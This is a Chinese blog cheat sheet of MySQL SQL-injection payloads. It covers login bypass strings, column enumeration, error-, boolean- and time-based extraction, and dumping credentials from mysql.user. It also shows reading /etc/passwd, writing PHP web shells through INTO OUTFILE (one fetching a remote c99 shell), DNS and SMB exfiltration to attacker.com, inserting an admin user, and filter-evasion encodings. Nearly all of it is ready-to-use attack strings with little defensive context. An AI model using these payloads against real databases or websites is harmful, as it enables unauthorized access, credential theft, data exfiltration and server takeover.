提交数据里面有and就报错_数据库的一些注入技巧mysql

9b7629c20fc4a37ee704c0b73b03af8e.png

数据库的一些注入技巧-mysql

默认数据库

MySQL

需要root权限

information_schema

版本5及更高版本可用

尝试注入

False表示查询无效(mysql语句错误/网页内容为空/与原页面不一致)

True表示查询有效(网页内容与原先一致)

字符串型

漏洞语句:

select * from table where id = ‘1’;

'

False

''

True

"

False

""

True

\

False

\\

True

例子:

SELECT * FROMArticles WHERE id = '1''';

SELECT 1 FROM dualWHERE 1 = '1'''''''''''''UNION SELECT '2';

数字型

漏洞语句:

SELECT * FROM Table WHERE id = 1;

AND 1  True

AND 0  False

AND true   True

AND false  False

1-false    如果有漏洞则返回1

1-true如果有漏洞则返回0

1*56   如果有漏洞则返回56

1*56        如果没漏洞则返回1

例子:

SELECT * FROM UsersWHERE id = 3-2;

笔记:

true 等同于 1.

false等同于 0.

e9372341186919712300a6f040ad6227.png

登录口

漏洞语句:

SELECT * FROM Table WHERE username = '';

' OR '1

' OR 1 -- -

" OR "" = "

" OR 1 = 1 -- -

'='

'LIKE'

'=0--+

例子:

SELECT * FROM Users WHERE username = 'Mike' AND password = '' OR '' = '';

注释查询

以下内容可用于注释掉后面的其他语句

#

/*

-- -

;%00

`

例子:

SELECT * FROM Users WHERE username = '' OR 1=1 -- -' AND password ='';

SELECT * FROM Users WHERE id = '' UNION SELECT 1, 2, 3`';

获取版本

VERSION()

@@VERSION

@@GLOBAL.VERSION

例子:

SELECT * FROM Users WHERE id = '1' ANDMID(VERSION(),1,1) = '5';

内联注释

例子:

漏洞语句:

SELECT * FROM Users limit 1,{INJECTION POINT};

/*!50094eaea*/;

False – 数据库版本大于等于 5.00.94

/*!50096eaea*/;

True -   数据库版本小于5.00.96

/*!50095eaea*/;

False -  数据库版本等于5.00.95

数据库凭证

Table

mysql.user

Columns

user, password

Current  User

user(), current_user(), current_user, system_user(),  session_user()

例子:

SELECT current_user;

SELECT CONCAT_WS(0x3A, userpassword)FROM mysql.user WHERE user = 'root'-- (Privileged)

7ab1b578b278ac778e606c204541102d.png

密码可以解密

30f8f761bbbd1439918fc09bae1e6d2a.png

数据库名称

Tables

information_schema.schemata, mysql.db

Columns

schema_name, db

Current  DB

database(), schema()

例子:

SELECT database();

SELECT schema_name FROM information_schema.schemata;

SELECT DISTINCT(db) FROM mysql.db;-- (Privileged)

760d36d0499da38c87af741800bf9eda.png

数据库主机名

例子:

SELECT @@hostname;

获取表和列

确定列数

通过group/order

GROUP/ORDER BY n+1;

笔记:

不断增加数字,直到页面错误

例子:

漏洞语句:

SELECTusername, password, permission FROM Users WHERE id = '{INJECTION POINT}';

1' ORDER BY 1--+  True

1' ORDER BY 2--+  True

1' ORDER BY 3--+  True

1' ORDER BY 4--+  False

-1' UNION SELECT 1,2,3--+   True 说明存在三列

通过报错(一)

GROUP/ORDER BY 1,2,3,4,5...

例子:

漏洞语句:

 SELECTusername, password, permission FROM Users WHERE id = '{INJECTION POINT}'

1' GROUP BY 1,2,3,4,5--+

Unknown column  '4' in 'group statement'

1'  ORDER BY 1,2,3,4,5--+

Unknown column  '4' in 'order clause'

通过报错(二)

SELECT ... INTO var_list, var_list1, var_list2...

例子1:

漏洞语句:

 SELECTpermission FROM Users WHERE id = {INJECTION POINT};

-1 UNION SELECT 1 INTO @,@,@

The used SELECT  statements have a different number of columns

-1  UNION SELECT 1 INTO @,@

The used SELECT  statements have a different number of columns

-1  UNION SELECT 1 INTO @

No error means  query uses 1 column

例子 2:

漏洞语句:

SELECT username,permission FROM Users limit 1,{INJECTION POINT};

1 INTO @,@,@

The used SELECT  statements have a different number of columns

1  INTO @,@

No error means  query uses 2 columns

通过报错(三)

AND (SELECT * FROM SOME_EXISTING_TABLE) = 1

例子:

漏洞语句:

SELECT permission FROMUsers WHERE id = {INJECTION POINT};

1 AND (SELECT * FROM Users) = 1

Operand should  contain 3 column(s)

检索表内容

联合查询

UNION SELECTGROUP_CONCAT(table_name) FROM information_schema.tables WHERE version=10;

布尔查询

AND SELECT SUBSTR(table_name,1,1)  FROM information_schema.tables > 'A'

报错查询

AND(SELECT COUNT(*) FROM (SELECT  1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT table_name FROM  information_schema.tables LIMIT 1),FLOOR(RAND(0)*2)))

(@:=1)||@  GROUP BY CONCAT((SELECT table_name FROM information_schema.tables LIMIT  1),!@) HAVING @||MIN(@:=0);

AND  ExtractValue(1, CONCAT(0x5c, (SELECT table_name FROM  information_schema.tables LIMIT 1)));-- Available in 5.1.5

检索列内容

联合查询

UNION SELECT GROUP_CONCAT(column_name) FROMinformation_schema.columns WHERE table_name = 'tablename'

布尔查询

AND SELECT  SUBSTR(column_name,1,1) FROM information_schema.columns > 'A'

报错查询

AND(SELECT COUNT(*)  FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP BY CONCAT((SELECT  column_name FROM information_schema.columns LIMIT 1),FLOOR(RAND(0)*2)))

(@:=1)||@ GROUP BY  CONCAT((SELECT column_name FROM information_schema.columns LIMIT 1),!@)  HAVING @||MIN(@:=0);

AND ExtractValue(1,  CONCAT(0x5c, (SELECT column_name FROM information_schema.columns LIMIT  1)));-- Available in MySQL 5.1.5

AND (1,2,3) =  (SELECT * FROM SOME_EXISTING_TABLE UNION SELECT 1,2,3 LIMIT 1)-- Fixed in  MySQL 5.1

AND (SELECT * FROM  (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b) a)

AND (SELECT * FROM  (SELECT * FROM SOME_EXISTING_TABLE JOIN SOME_EXISTING_TABLE b USING  (SOME_EXISTING_COLUMN)) a)

limit注入

漏洞语句:

 SELECT username, permission FROM Users WHEREid = 1;

1 PROCEDURE ANALYSE()

Get the first  column's name

1  LIMIT 1,1 PROCEDURE ANALYSE()

Get the second  column's name

1  LIMIT 2,1 PROCEDURE ANALYSE()

Get the third  column's name

一次检索多个表/列

o    SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@) FROM(information_schema.columns) WHERE (table_schema>=@) AND (@)IN (@:=CONCAT(@,0x0a,'[ ',table_schema,' ] >',table_name,' > ',column_name))))x

SELECT * FROM Users WHERE id = '-1' UNION SELECT1, 2, (SELECT (@) FROM (SELECT(@:=0x00),(SELECT (@)FROM (information_schema.columns) WHERE (table_schema>=@) AND (@)IN(@:=CONCAT(@,0x0a,' [ ',table_schema,' ] >',table_name,' >',column_name))))x), 4--+';

输出为

[ information_schema ] >CHARACTER_SETS >CHARACTER_SET_NAME

[ information_schema ] >CHARACTER_SETS >DEFAULT_COLLATE_NAME

[ information_schema ] >CHARACTER_SETS >DESCRIPTION

[ information_schema ] >CHARACTER_SETS >MAXLEN

[ information_schema ] >COLLATIONS >COLLATION_NAME

[ information_schema ] >COLLATIONS >CHARACTER_SET_NAME

[ information_schema ] >COLLATIONS > ID

[ information_schema ] >COLLATIONS >IS_DEFAULT

[ information_schema ] >COLLATIONS >IS_COMPILED

SELECT MID(GROUP_CONCAT(0x3c62723e, 0x5461626c653a20, table_name,0x3c62723e, 0x436f6c756d6e3a20, column_name ORDER BY (SELECT version FROMinformation_schema.tables) SEPARATOR 0x3c62723e),1,1024) FROMinformation_schema.columns

SELECT username FROM Users WHERE id = '-1' UNIONSELECT MID(GROUP_CONCAT(0x3c62723e,0x5461626c653a20, table_name, 0x3c62723e, 0x436f6c756d6e3a20, column_name ORDERBY (SELECT version FROM information_schema.tables) SEPARATOR0x3c62723e),1,1024) FROM information_schema.columns--+';

输出为

Table: talk_revisions

Column: revid

Table: talk_revisions

Column: userid

Table: talk_revisions

Column: user

Table: talk_projects

Column: priority

从系统列查询信息

SELECT table_name FROM information_schema.columnsWHERE column_name = 'username';

SELECT table_name FROM information_schema.columnsWHERE column_name LIKE '%user%';

SELECT column_name FROMinformation_schema.columns WHERE table_name = 'Users';

SELECT column_name FROMinformation_schema.columns WHERE table_name LIKE '%user%';

不使用单引号

SELECT * FROM Users WHERE username = 0x61646D696E

SELECT * FROM Users WHERE username = CHAR(97,100, 109, 105, 110)

字符串连接

SELECT 'a' 'd' 'mi' 'n';

SELECT CONCAT('a', 'd', 'm', 'i', 'n');

SELECT GROUP_CONCAT('a', 'd', 'm', 'i', 'n');

SELECT CONCAT_WS('', 'a', 'd', 'm', 'i', 'n');

条件语句

CASE

IF()

IFNULL()

NULLIF()

SELECT IF(1=1, true, false);

SELECT CASE WHEN 1=1 THEN true ELSE false END;

时间判断

SLEEP()

MySQL 5

BENCHMARK()

MySQL 4/5

' - (IF(MID(version(),1,1) LIKE 5, BENCHMARK(100000,SHA1('true')), false)) - '

权限判断

确定哪个用户具有file权限

ELECT file_priv FROM mysql.user  WHERE user = 'username';

Root privileges  required

MySQL 4/5

SELECT  grantee, is_grantable FROM information_schema.user_privileges WHERE  privilege_type = 'file' AND grantee like '%username%';

No privileges  required

MySQL 5

文件读取

具有file权限的用户可以读取文件

LOAD_FILE()

SELECT LOAD_FILE('/etc/passwd');

SELECT LOAD_FILE(0x2F6574632F706173737764);

写文件

具有file权限的用户可以写文件

INTOOUTFILE/DUMPFILE

SELECT ' system($_GET[\'c\']); ?>' INTO OUTFILE '/var/www/shell.php';

http://localhost/shell.php?c=cat%20/etc/passwd

SELECT ' fwrite(fopen($_GET[f], \'w\'),file_get_contents($_GET[u])); ?>' INTO OUTFILE '/var/www/get.php'

http://localhost/get.php?f=shell.php&u=http://localhost/c99.txt

数据带外

DNS

SELECT LOAD_FILE(CONCAT('\\\\foo.',(selectMID(version(),1,1)),'.attacker.com\\'));

SMB

' OR 1=1 INTO OUTFILE'\\\\attacker\\SMBshare\\output.txt

多语句执行

SELECT * FROM Users WHERE ID=1 AND 1=0; INSERT INTOUsers(username, password, priv) VALUES ('BobbyTables', 'kl20da$$','admin');

SELECT * FROM Users WHERE ID=1 AND 1=0; SHOW COLUMNS FROMUsers;

内联查询

MySQL允许在感叹号后指定版本号。仅当版本大于或等于指定的版本号时,才执行注释中的语法。

UNION SELECT /*!50000 5,null;%00*//*!40000 4,null-- ,*//*!30000 3,null--x*/0,null--+

SELECT 1/*!41320UNION/*!/*!/*!00000SELECT/*!/*!USER/*!(/*!/*!/*!*/);

混淆

以下字符可以代替空格

09

0A

0B

0C

0D

A0

20

'%0A%09UNION%0CSELECT%A0NULL%20%23

括号也可以用来避免使用空格

UNION(SELECT(column)FROM(table))

and/or之后可以使用的符号

20

Space

2B

+

2D

-

7E

~

21

!

40

@

SELECT 1 FROM dual WHERE 1=1 AND-+-+-+-+~~((1))

利用注释+换行

1'#AND 0--UNION# Iam a comment!SELECT@tmp:=table_name x FROM--`information_schema`.tables LIMIT 1#

1'%23%0AAND 0--%0AUNION%23I am a comment!%0ASELECT@tmp:=table_name x FROM--%0A`information_schema`.tablesLIMIT 1%23

VERSION/**/%A0 (/*comment*/)

URL  Encoding

SELECT %74able_%6eame FROM information_schema.tables;

Double  URL Encoding

SELECT %2574able_%256eame FROM information_schema.tables;

Unicode  Encoding

SELECT %u0074able_%u6eame FROM information_schema.tables;

Invalid  Hex Encoding (ASP)

SELECT %tab%le_%na%me FROM information_schema.tables;

逃避某些关键字

空格

information_schema . tables

反引号

`information_schema`.`tables`

注释

/*!information_schema.tables*/

其他

information_schema.partitions
 information_schema.statistics
 information_schema.key_column_usage
 information_schema.table_constraints

条件比较

AND , &&

=

:=

BETWEEN ... AND ...

BINARY

&

~

|

^

CASE

DIV

/

<=>

=

>=

>

IS NOT NULL

IS NOT

IS NULL

IS

<<

<=

<

LIKE

-

% or MOD

NOT BETWEEN ... AND ...

!= , <>

NOT LIKE

NOT REGEXP

NOT , !

|| , OR

+

REGEXP

>>

RLIKE

SOUNDS LIKE

*

-

XOR

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值